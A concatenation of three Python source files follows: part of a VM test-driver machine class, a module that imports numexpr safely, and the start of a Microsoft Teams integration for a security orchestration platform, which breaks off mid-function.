if not chunk:
# Probably a broken pipe, return the output we have
break
decoded = chunk.decode()
output_buffer += [decoded]
if decoded[-1] == "\n":
break
return "".join(output_buffer)
def execute(
self, command: str, check_return: bool = True, timeout: Optional[int] = 900
) -> Tuple[int, str]:
self.run_callbacks()
self.connect()
if timeout is not None:
command = "timeout {} sh -c {}".format(timeout, shlex.quote(command))
out_command = f"( set -euo pipefail; {command} ) | (base64 --wrap 0; echo)\n"
assert self.shell
self.shell.send(out_command.encode())
# Get the output
output = base64.b64decode(self._next_newline_closed_block_from_shell())
if not check_return:
return (-1, output.decode())
# Get the return code
self.shell.send("echo ${PIPESTATUS[0]}\n".encode())
rc = int(self._next_newline_closed_block_from_shell().strip())
return (rc, output.decode())
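# Note (added for clarity): piping through `base64 --wrap 0` makes the guest reply
# a single newline-terminated line, so one read of
# _next_newline_closed_block_from_shell() captures the whole output; e.g.
# `echo -n hi` comes back as "aGk=\n" and base64.b64decode() restores b"hi".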
def shell_interact(self) -> None:
"""Allows you to interact with the guest shell
Should only be used during test development, not in the production test."""
self.connect()
self.log("Terminal is ready (there is no prompt):")
assert self.shell
subprocess.run(
["socat", "READLINE", f"FD:{self.shell.fileno()}"],
pass_fds=[self.shell.fileno()],
)
def succeed(self, *commands: str, timeout: Optional[int] = None) -> str:
"""Execute each command and check that it succeeds."""
output = ""
for command in commands:
with self.nested("must succeed: {}".format(command)):
(status, out) = self.execute(command, timeout=timeout)
if status != 0:
self.log("output: {}".format(out))
raise Exception(
"command `{}` failed (exit code {})".format(command, status)
)
output += out
return output
def fail(self, *commands: str, timeout: Optional[int] = None) -> str:
"""Execute each command and check that it fails."""
output = ""
for command in commands:
with self.nested("must fail: {}".format(command)):
(status, out) = self.execute(command, timeout=timeout)
if status == 0:
raise Exception(
"command `{}` unexpectedly succeeded".format(command)
)
output += out
return output
def wait_until_succeeds(self, command: str, timeout: int = 900) -> str:
"""Wait until a command returns success and return its output.
Throws an exception on timeout.
"""
output = ""
def check_success(_: Any) -> bool:
nonlocal output
status, output = self.execute(command, timeout=timeout)
return status == 0
with self.nested("waiting for success: {}".format(command)):
retry(check_success, timeout)
return output
def wait_until_fails(self, command: str, timeout: int = 900) -> str:
"""Wait until a command returns failure.
Throws an exception on timeout.
"""
output = ""
def check_failure(_: Any) -> bool:
nonlocal output
status, output = self.execute(command, timeout=timeout)
return status != 0
with self.nested("waiting for failure: {}".format(command)):
retry(check_failure, timeout)
return output
def wait_for_shutdown(self) -> None:
if not self.booted:
return
with self.nested("waiting for the VM to power off"):
sys.stdout.flush()
assert self.process
self.process.wait()
self.pid = None
self.booted = False
self.connected = False
def get_tty_text(self, tty: str) -> str:
status, output = self.execute(
"fold -w$(stty -F /dev/tty{0} size | "
"awk '{{print $2}}') /dev/vcs{0}".format(tty)
)
return output
def wait_until_tty_matches(self, tty: str, regexp: str) -> None:
"""Wait until the visible output on the chosen TTY matches regular
expression. Throws an exception on timeout.
"""
matcher = re.compile(regexp)
def tty_matches(last: bool) -> bool:
text = self.get_tty_text(tty)
if last:
self.log(
f"Last chance to match /{regexp}/ on TTY{tty}, "
f"which currently contains: {text}"
)
return len(matcher.findall(text)) > 0
with self.nested("waiting for {} to appear on tty {}".format(regexp, tty)):
retry(tty_matches)
def send_chars(self, chars: List[str]) -> None:
with self.nested("sending keys ‘{}‘".format(chars)):
for char in chars:
self.send_key(char)
def wait_for_file(self, filename: str) -> None:
"""Waits until the file exists in machine's file system."""
def check_file(_: Any) -> bool:
status, _ = self.execute("test -e {}".format(filename))
return status == 0
with self.nested("waiting for file ‘{}‘".format(filename)):
retry(check_file)
def wait_for_open_port(self, port: int) -> None:
def port_is_open(_: Any) -> bool:
status, _ = self.execute("nc -z localhost {}".format(port))
return status == 0
with self.nested("waiting for TCP port {}".format(port)):
retry(port_is_open)
def wait_for_closed_port(self, port: int) -> None:
def port_is_closed(_: Any) -> bool:
status, _ = self.execute("nc -z localhost {}".format(port))
return status != 0
with self.nested("waiting for TCP port {} to be closed"):
retry(port_is_closed)
def start_job(self, jobname: str, user: Optional[str] = None) -> Tuple[int, str]:
return self.systemctl("start {}".format(jobname), user)
def stop_job(self, jobname: str, user: Optional[str] = None) -> Tuple[int, str]:
return self.systemctl("stop {}".format(jobname), user)
def wait_for_job(self, jobname: str) -> None:
self.wait_for_unit(jobname)
def connect(self) -> None:
if self.connected:
return
with self.nested("waiting for the VM to finish booting"):
self.start()
assert self.shell
tic = time.time()
self.shell.recv(1024)
# TODO: Timeout
toc = time.time()
self.log("connected to guest root shell")
self.log("(connecting took {:.2f} seconds)".format(toc - tic))
self.connected = True
def screenshot(self, filename: str) -> None:
out_dir = os.environ.get("out", os.getcwd())
word_pattern = re.compile(r"^\w+$")
if word_pattern.match(filename):
filename = os.path.join(out_dir, "{}.png".format(filename))
tmp = "{}.ppm".format(filename)
with self.nested(
"making screenshot {}".format(filename),
{"image": os.path.basename(filename)},
):
self.send_monitor_command("screendump {}".format(tmp))
ret = subprocess.run("pnmtopng {} > {}".format(tmp, filename), shell=True)
os.unlink(tmp)
if ret.returncode != 0:
raise Exception("Cannot convert screenshot")
def copy_from_host_via_shell(self, source: str, target: str) -> None:
"""Copy a file from the host into the guest by piping it over the
shell into the destination file. Works without a host-guest shared folder.
Prefer copy_from_host whenever possible.
"""
with open(source, "rb") as fh:
content_b64 = base64.b64encode(fh.read()).decode()
self.succeed(
f"mkdir -p $(dirname {target})",
f"echo -n {content_b64} | base64 -d > {target}",
)
def copy_from_host(self, source: str, target: str) -> None:
"""Copy a file from the host into the guest via the `shared_dir` shared
among all the VMs (using a temporary directory).
"""
host_src = Path(source)
vm_target = Path(target)
with tempfile.TemporaryDirectory(dir=self.shared_dir) as shared_td:
shared_temp = Path(shared_td)
host_intermediate = shared_temp / host_src.name
vm_shared_temp = Path("/tmp/shared") / shared_temp.name
vm_intermediate = vm_shared_temp / host_src.name
self.succeed(make_command(["mkdir", "-p", vm_shared_temp]))
if host_src.is_dir():
shutil.copytree(host_src, host_intermediate)
else:
shutil.copy(host_src, host_intermediate)
self.succeed(make_command(["mkdir", "-p", vm_target.parent]))
self.succeed(make_command(["cp", "-r", vm_intermediate, vm_target]))
def copy_from_vm(self, source: str, target_dir: str = "") -> None:
"""Copy a file from the VM (specified by an in-VM source path) to a path
relative to `$out`. The file is copied via the `shared_dir` shared among
all the VMs (using a temporary directory).
"""
# Compute the source, target, and intermediate shared file names
out_dir = Path(os.environ.get("out", os.getcwd()))
vm_src = Path(source)
with tempfile.TemporaryDirectory(dir=self.shared_dir) as shared_td:
shared_temp = Path(shared_td)
vm_shared_temp = Path("/tmp/shared") / shared_temp.name
vm_intermediate = vm_shared_temp / vm_src.name
intermediate = shared_temp / vm_src.name
# Copy the file to the shared directory inside VM
self.succeed(make_command(["mkdir", "-p", vm_shared_temp]))
self.succeed(make_command(["cp", "-r", vm_src, vm_intermediate]))
abs_target = out_dir / target_dir / vm_src.name
abs_target.parent.mkdir(exist_ok=True, parents=True)
# Copy the file from the shared directory outside VM
if intermediate.is_dir():
shutil.copytree(intermediate, abs_target)
else:
shutil.copy(intermediate, abs_target)
def dump_tty_contents(self, tty: str) -> None:
"""Debugging: Dump the contents of the TTY<n>"""
self.execute("fold -w 80 /dev/vcs{} | systemd-cat".format(tty))
def _get_screen_text_variants(self, model_ids: Iterable[int]) -> List[str]:
with tempfile.TemporaryDirectory() as tmpdir:
screenshot_path = os.path.join(tmpdir, "ppm")
self.send_monitor_command(f"screendump {screenshot_path}")
return _perform_ocr_on_screenshot(screenshot_path, model_ids)
def get_screen_text_variants(self) -> List[str]:
return self._get_screen_text_variants([0, 1, 2])
def get_screen_text(self) -> str:
return self._get_screen_text_variants([2])[0]
def wait_for_text(self, regex: str) -> None:
def screen_matches(last: bool) -> bool:
variants = self.get_screen_text_variants()
for text in variants:
if re.search(regex, text) is not None:
return True
if last:
self.log("Last OCR attempt failed. Text was: {}".format(variants))
return False
with self.nested("waiting for {} to appear on screen".format(regex)):
retry(screen_matches)
def wait_for_console_text(self, regex: str) -> None:
with self.nested("waiting for {} to appear on console".format(regex)):
# Buffer the console output, this is needed
# to match multiline regexes.
console = io.StringIO()
while True:
try:
console.write(self.last_lines.get())
except queue.Empty:
self.sleep(1)
continue
console.seek(0)
matches = re.search(regex, console.read())
if matches is not None:
return
def send_key(self, key: str) -> None:
key = CHAR_TO_KEY.get(key, key)
self.send_monitor_command("sendkey {}".format(key))
time.sleep(0.01)
def start(self) -> None:
if self.booted:
return
self.log("starting vm")
def clear(path: Path) -> Path:
if path.exists():
path.unlink()
return path
def create_socket(path: Path) -> socket.socket:
s = socket.socket(family=socket.AF_UNIX, type=socket.SOCK_STREAM)
s.bind(str(path))
s.listen(1)
return s
monitor_socket = create_socket(clear(self.monitor_path))
shell_socket = create_socket(clear(self.shell_path))
self.process = self.start_command.run(
self.state_dir,
self.shared_dir,
self.monitor_path,
self.shell_path,
)
self.monitor, _ = monitor_socket.accept()
self.shell, _ = shell_socket.accept()
# Store last serial console lines for use
# of wait_for_console_text
self.last_lines: Queue = Queue()
def process_serial_output() -> None:
assert self.process
assert self.process.stdout
for _line in self.process.stdout:
# Ignore undecodable bytes that may occur in boot menus
line = _line.decode(errors="ignore").replace("\r", "").rstrip()
self.last_lines.put(line)
self.log_serial(line)
self.serial_thread = threading.Thread(target=process_serial_output)
self.serial_thread.start()
self.wait_for_monitor_prompt()
self.pid = self.process.pid
self.booted = True
self.log("QEMU running (pid {})".format(self.pid))
def cleanup_statedir(self) -> None:
shutil.rmtree(self.state_dir)
rootlog.log(f"deleting VM state directory {self.state_dir}")
rootlog.log("if you want to keep the VM state, pass --keep-vm-state")
def shutdown(self) -> None:
if not self.booted:
return
assert self.shell
self.shell.send("poweroff\n".encode())
self.wait_for_shutdown()
def crash(self) -> None:
if not self.booted:
return
self.log("forced crash")
self.send_monitor_command("quit")
self.wait_for_shutdown()
def wait_for_x(self) -> None:
"""Wait until it is possible to connect to the X server. Note that
testing the existence of /tmp/.X11-unix/X0 is insufficient.
"""
def check_x(_: Any) -> bool:
cmd = (
"journalctl -b SYSLOG_IDENTIFIER=systemd | "
+ 'grep "Reached target Current graphical"'
)
status, _ = self.execute(cmd)
if status != 0:
return False
status, _ = self.execute("[ -e /tmp/.X11-unix/X0 ]")
return status == 0
with self.nested("waiting for the X11 server"):
retry(check_x)
def get_window_names(self) -> List[str]:
return self.succeed(
r"xwininfo -root -tree | sed 's/.*0x[0-9a-f]* \"\([^\"]*\)\".*/\1/; t; d'"
).splitlines()
def wait_for_window(self, regexp: str) -> None:
pattern = re.compile(regexp)
def window_is_visible(last_try: bool) -> bool:
names = self.get_window_names()
if last_try:
self.log(
"Last chance to match {} on the window list,".format(regexp)
+ " which currently contains: "
+ ", ".join(names)
)
return any(pattern.search(name) for name in names)
with self.nested("waiting for a window to appear"):
retry(window_is_visible)
def sleep(self, secs: int) -> None:
# We want to sleep in *guest* time, not *host* time.
self.succeed(f"sleep {secs}")
def forward_port(self, host_port: int = 8080, guest_port: int = 80) -> None:
"""Forward a TCP port on the host to a TCP port on the guest.
Useful during interactive testing.
"""
self.send_monitor_command(
"hostfwd_add tcp::{}-:{}".format(host_port, guest_port)
)
def block(self) -> None:
"""Make the machine unreachable by shutting down eth1 (the multicast
interface used to talk to the other VMs). We keep eth0 up so that
the test driver can continue to talk to the machine.
"""
self.send_monitor_command("set_link virtio-net-pci.1 off")
def unblock(self) -> None:
"""Make the machine reachable."""
self.send_monitor_command("set_link virtio-net-pci.1 on")
def release(self) -> None:
if self.pid is None:
return
rootlog.info(f"kill machine (pid {self.pid})")
assert self.process
assert self.shell
assert self.monitor
assert self.serial_thread
self.process.terminate()
self.shell.close()
self.monitor.close()
self.serial_thread.join()
def run_callbacks(self) -> None:
for callback in self.callbacks:
callback()
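# A minimal sketch (kept as comments) of how a test script typically drives the
# helpers defined above. `machine` is assumed to be an instance handed to the
# test by the driver; the unit name and port are illustrative only.
#
#     machine.start()
#     machine.wait_for_unit("nginx.service")          # hypothetical unit
#     machine.wait_for_open_port(80)
#     machine.succeed("curl -sf http://localhost:80/")
#     machine.copy_from_vm("/var/log/nginx/access.log", "logs")
#     machine.screenshot("after_boot")
#     machine.shutdown()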
|
numexpr.py
|
"""Tools for working with Numexp.
At present all this module provides is a safe way of importing
``numexpr``. This prevents a hard crash (i.e. segfault) when the MKL
is enabled but cannot be found. Just go:
>>> from mmfutils.performance.numexpr import numexpr
"""
__all__ = ['numexpr']
numexpr = False
try:
import numexpr
# These convolutions are needed to deal with a common failure mode: If the
# MKL libraries cannot be found, then the whole python process crashes with
# a library error. We test this in a separate process and if it fails, we
# disable the MKL.
import multiprocessing
def check(q): # pragma: nocover
import numexpr
q.put(numexpr.get_vml_version())
q = multiprocessing.Queue()
_p = multiprocessing.Process(target=check, args=[q])
_p.start()
_p.join()
if q.empty(): # pragma: nocover
# Fail
numexpr.use_vml = False
except ImportError: # pragma: nocover
pass
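# A small usage sketch, kept as comments so this module stays import-safe. The
# NumPy fallback shown here is an assumption of the caller, not part of this
# module; array names are illustrative.
#
#     import numpy as np
#     from mmfutils.performance.numexpr import numexpr
#
#     a, b = np.random.random((2, 1000000))
#     if numexpr:
#         c = numexpr.evaluate("2*a + 3*b")   # numexpr path (VML may be disabled)
#     else:
#         c = 2*a + 3*b                       # plain NumPy fallback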
|
MicrosoftTeams.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List, Tuple
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
ENTITLEMENT_REGEX: str = \
r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
MENTION_REGEX = r'^@([^@;]+);| @([^@;]+);'
ENTRY_FOOTER: str = 'From Microsoft Teams'
MESSAGE_TYPES: dict = {
'mirror_entry': 'mirrorEntry',
'incident_opened': 'incidentOpened',
'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
"""
Return the number of seconds for the given date. If no date is given, return the current time.
:param d: timestamp datetime object
:return: timestamp in epoch
"""
if not d:
d = datetime.utcnow()
return int((d - datetime.utcfromtimestamp(0)).total_seconds())
def error_parser(resp_err: requests.Response, api: str = 'graph') -> str:
"""
Parses Microsoft API error message from Requests response
:param resp_err: response with error
:param api: API to query (graph/bot)
:return: string of error
"""
try:
response: dict = resp_err.json()
if api == 'graph':
error: dict = response.get('error', {})
err_str: str = f"{error.get('code', '')}: {error.get('message', '')}"
if err_str:
return err_str
elif api == 'bot':
error_description: str = response.get('error_description', '')
if error_description:
return error_description
# If no error message
raise ValueError()
except ValueError:
return resp_err.text
def translate_severity(severity: str) -> int:
"""
Translates Demisto text severity to int severity
:param severity: Demisto text severity
:return: Demisto integer severity
"""
severity_dictionary = {
'Low': 1,
'Medium': 2,
'High': 3,
'Critical': 4
}
return severity_dictionary.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
"""
Creates incidents according to a provided JSON object
:param demisto_user: The demisto user associated with the request (if exists)
:param incidents: The incidents JSON
:return: The creation result
"""
if demisto_user:
data = demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
else:
data = demisto.createIncidents(incidents)
return data
def process_incident_create_message(demisto_user: dict, message: str) -> str:
"""
Processes an incident creation message
:param demisto_user: The Demisto user associated with the message (if exists)
:param message: The creation message
:return: Creation result
"""
json_pattern: str = r'(?<=json=).*'
name_pattern: str = r'(?<=name=).*'
type_pattern: str = r'(?<=type=).*'
json_match: Optional[Match[str]] = re.search(json_pattern, message)
created_incident: Union[dict, list]
data: str = str()
if json_match:
if re.search(name_pattern, message) or re.search(type_pattern, message):
data = 'No other properties other than json should be specified.'
else:
incidents_json: str = json_match.group()
incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
if not isinstance(incidents, list):
incidents = [incidents]
created_incident = create_incidents(demisto_user, incidents)
if not created_incident:
data = 'Failed creating incidents.'
else:
name_match: Optional[Match[str]] = re.search(name_pattern, message)
if not name_match:
data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
else:
incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
incident_type: str = str()
type_match: Optional[Match[str]] = re.search(type_pattern, message)
if type_match:
incident_type = re.sub('name=.*', '', type_match.group()).strip()
incident: dict = {'name': incident_name}
incident_type = incident_type or INCIDENT_TYPE
if incident_type:
incident['type'] = incident_type
created_incident = create_incidents(demisto_user, [incident])
if not created_incident:
data = 'Failed creating incidents.'
if created_incident:
if isinstance(created_incident, list):
created_incident = created_incident[0]
created_incident = cast(Dict[Any, Any], created_incident)
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
return data
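# Illustrative direct messages accepted by the parser above (all values are
# made up):
#
#     "new incident name=Suspicious login type=Phishing"
#     'new incident json={"name": "Suspicious login", "type": "Phishing"}'
#
# The two forms are mutually exclusive: combining json= with name=/type= is
# rejected above.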
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
"""
Checks if investigation is already mirrored
:param investigation_id: Investigation ID to check if mirrored
:param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
:return: Index in mirrored channels list if mirrored, else -1
"""
for index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
return index
return -1
def urlify_hyperlinks(message: str) -> str:
"""
Turns URLs into markdown hyperlinks
e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
:param message: Message to look for URLs in
:return: Formatted message with hyper-links
"""
formatted_message: str = message
# URLify markdown hyperlinks
urls = re.findall(URL_REGEX, message)
for url in urls:
formatted_message = formatted_message.replace(url, f'[{url}]({url})')
return formatted_message
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
"""
Searches for a team member
:param integration_context: Cached object to search for team member in
:param team_member_id: Team member ID to search for
:return: Found team member object
"""
team_member: dict = dict()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for member in team_members:
if member.get('id') == team_member_id:
team_member['username'] = member.get('name', '')
team_member['user_email'] = member.get('userPrincipalName', '')
return team_member
raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
"""
Gets team member ID based on name, email or principal name
:param requested_team_member: Team member name / principal name / email to look for
:param integration_context: Cached object to search for team member in
:return: Team member ID
"""
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for team_member in team_members:
if requested_team_member in {team_member.get('name', ''), team_member.get('userPrincipalName', '')}:
return team_member.get('id')
raise ValueError(f'Team member {requested_team_member} was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
"""
Creates Microsoft Teams adaptive card object given body and actions
:param body: Adaptive card data
:param actions: Adaptive card actions
:return: Adaptive card object
"""
adaptive_card: dict = {
'contentType': 'application/vnd.microsoft.card.adaptive',
'content': {
'$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
'version': '1.0',
'type': 'AdaptiveCard',
'body': body
}
}
if actions:
adaptive_card['content']['actions'] = actions
return adaptive_card
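# Illustrative only: a minimal card built with the helper above. The TextBlock
# body and the Action.Submit payload are example values (the same shapes are
# used by process_ask_user further down).
#
#     card = create_adaptive_card(
#         body=[{'type': 'TextBlock', 'text': 'Approve this request?'}],
#         actions=[{'type': 'Action.Submit', 'title': 'Approve', 'data': {'response': 'Approve'}}]
#     )
#     # card['contentType'] == 'application/vnd.microsoft.card.adaptive'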
def process_tasks_list(data_by_line: list) -> dict:
"""
Processes the list of tasks assigned to the user, as provided by the Demisto server, and creates an adaptive card
:param data_by_line: List of tasks to process
:return: Adaptive card of assigned tasks
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'Task:',
'value': split_data[0]
},
{
'title': 'Incident:',
'value': split_data[1]
},
{
'title': 'Due:',
'value': split_data[2]
},
{
'title': 'Link:',
'value': f'[{split_data[3]}]({split_data[3]})'
}
]
})
return create_adaptive_card(body)
def process_incidents_list(data_by_line: list) -> dict:
"""
Processes the list of incidents assigned to the user, as provided by the Demisto server, and creates an adaptive card
:param data_by_line: List of incidents to process
:return: Adaptive card of assigned incidents
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'ID:',
'value': split_data[0]
},
{
'title': 'Name:',
'value': split_data[1]
},
{
'title': 'Status:',
'value': split_data[2]
},
{
'title': 'Type:',
'value': split_data[3]
},
{
'title': 'Owner:',
'value': split_data[4]
},
{
'title': 'Created:',
'value': split_data[5]
},
{
'title': 'Link:',
'value': f'[{split_data[6]}]({split_data[6]})'
}
]
})
return create_adaptive_card(body)
def process_mirror_or_unknown_message(message: str) -> dict:
"""
Processes mirror investigation command or unknown direct message and creates adaptive card
:param message: The direct message to process
:return: Adaptive card of mirror response / unknown message
"""
body: list = [{
'type': 'TextBlock',
'text': message.replace('\n', '\n\n'),
'wrap': True
}]
return create_adaptive_card(body)
def process_ask_user(message: str) -> dict:
"""
Processes ask user message and creates adaptive card
:param message: The question object
:return: Adaptive card of the question to send
"""
message_object: dict = json.loads(message)
text: str = message_object.get('message_text', '')
entitlement: str = message_object.get('entitlement', '')
options: list = message_object.get('options', [])
investigation_id: str = message_object.get('investigation_id', '')
task_id: str = message_object.get('task_id', '')
body = [
{
'type': 'TextBlock',
'text': text
}
]
actions: list = list()
for option in options:
actions.append({
'type': 'Action.Submit',
'title': option,
'data': {
'response': option,
'entitlement': entitlement,
'investigation_id': investigation_id,
'task_id': task_id
}
})
return create_adaptive_card(body, actions)
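# For reference, the message consumed above is a JSON string carrying the
# fields read by process_ask_user; the concrete values below are made up.
#
#     {
#         "message_text": "Should we block the indicator?",
#         "entitlement": "4404dae8-2d45-46bd-85fa-64779c12abe8",
#         "options": ["Yes", "No"],
#         "investigation_id": "100",
#         "task_id": "5"
#     }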
def get_bot_access_token() -> str:
"""
Retrieves Bot Framework API access token, either from cache or from Microsoft
:return: The Bot Framework API access token
"""
integration_context: dict = demisto.getIntegrationContext()
access_token: str = integration_context.get('bot_access_token', '')
valid_until: int = integration_context.get('bot_valid_until', 0)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'client_secret': BOT_PASSWORD,
'scope': 'https://api.botframework.com/.default'
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response, 'bot')
raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['bot_access_token'] = access_token
integration_context['bot_valid_until'] = time_now + expires_in
demisto.setIntegrationContext(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
"""
Retrieves Microsoft Graph API access token, either from cache or from Microsoft
:return: The Microsoft Graph API access token
"""
integration_context: dict = demisto.getIntegrationContext()
access_token: str = integration_context.get('graph_access_token', '')
valid_until: int = integration_context.get('graph_valid_until', 0)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly.'
)
url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'scope': 'https://graph.microsoft.com/.default',
'client_secret': BOT_PASSWORD
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response)
raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['graph_access_token'] = access_token
integration_context['graph_valid_until'] = time_now + expires_in
demisto.setIntegrationContext(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get Graph access token')
def http_request(
method: str, url: str = '', json_: dict = None, api: str = 'graph'
) -> Union[dict, list]:
"""
A wrapper for the requests lib to send our requests and handle requests and responses better.
Adds the authorization and content-type headers required by the Microsoft APIs.
:param method: any restful method
:param url: URL to query
:param json_: HTTP JSON body
:param api: API to query (graph/bot)
:return: requests.json()
"""
if api == 'graph':
access_token = get_graph_access_token()
else: # Bot Framework API
access_token = get_bot_access_token()
headers: dict = {
'Authorization': f'Bearer {access_token}',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
try:
response: requests.Response = requests.request(
method,
url,
headers=headers,
json=json_,
verify=USE_SSL
)
if not response.ok:
error: str = error_parser(response, api)
raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
if response.status_code in {202, 204}:
# Delete channel or remove user from channel return 204 if successful
# Update message returns 202 if the request has been accepted for processing
return {}
if response.status_code == 201:
# For channel creation query, we get a body in the response, otherwise we should just return
if not response.content:
return {}
try:
return response.json()
except ValueError:
raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
except requests.exceptions.ConnectTimeout:
error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
'accessible from your host.'
raise ConnectionError(error_message)
except requests.exceptions.SSLError:
error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
'the integration configuration.'
raise ConnectionError(error_message)
except requests.exceptions.ProxyError:
error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
'selected, try deselecting it.'
raise ConnectionError(error_message)
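# A hedged usage sketch: the wrapper above is what the command functions below
# use for every Graph / Bot Framework call, along the lines of (IDs and payload
# are illustrative):
#
#     channels = http_request('GET', f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels')
#     http_request('POST', f'{service_url}/v3/conversations/{channel_id}/activities',
#                  json_=conversation, api='bot')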
def integration_health():
bot_framework_api_health = 'Operational'
graph_api_health = 'Operational'
try:
get_bot_access_token()
except ValueError as e:
bot_framework_api_health = f'Non operational - {str(e)}'
try:
get_graph_access_token()
except ValueError as e:
graph_api_health = f'Non operational - {str(e)}'
api_health_output: list = [{
'Bot Framework API Health': bot_framework_api_health,
'Graph API Health': graph_api_health
}]
api_health_human_readable: str = tableToMarkdown('Microsoft API Health', api_health_output)
mirrored_channels_output = list()
integration_context: dict = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
mirrored_channels_output.append({
'Team': team.get('team_name'),
'Channel': channel.get('channel_name'),
'Investigation ID': channel.get('investigation_id')
})
mirrored_channels_human_readable: str
if mirrored_channels_output:
mirrored_channels_human_readable = tableToMarkdown(
'Microsoft Teams Mirrored Channels', mirrored_channels_output
)
else:
mirrored_channels_human_readable = 'No mirrored channels.'
demisto.results(api_health_human_readable + mirrored_channels_human_readable)
def validate_auth_header(headers: dict) -> bool:
"""
Validates the authorization header provided in the bot activity object
:param headers: Bot activity headers
:return: True if authorized, else False
"""
parts: list = headers.get('Authorization', '').split(' ')
if len(parts) != 2:
return False
schema: str = parts[0]
jwt_token: str = parts[1]
if schema != 'Bearer' or not jwt_token:
demisto.info('Authorization header validation - failed to verify schema')
return False
decoded_payload: dict = jwt.decode(jwt_token, verify=False)
issuer: str = decoded_payload.get('iss', '')
if issuer != 'https://api.botframework.com':
demisto.info('Authorization header validation - failed to verify issuer')
return False
integration_context: dict = demisto.getIntegrationContext()
open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
keys: list = open_id_metadata.get('keys', [])
unverified_headers: dict = jwt.get_unverified_header(jwt_token)
key_id: str = unverified_headers.get('kid', '')
key_object: dict = dict()
# Check if we got the requested key in cache
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in cache, getting new keys
try:
open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
if not response.ok:
demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
return False
response_json: dict = response.json()
jwks_uri: str = response_json.get('jwks_uri', '')
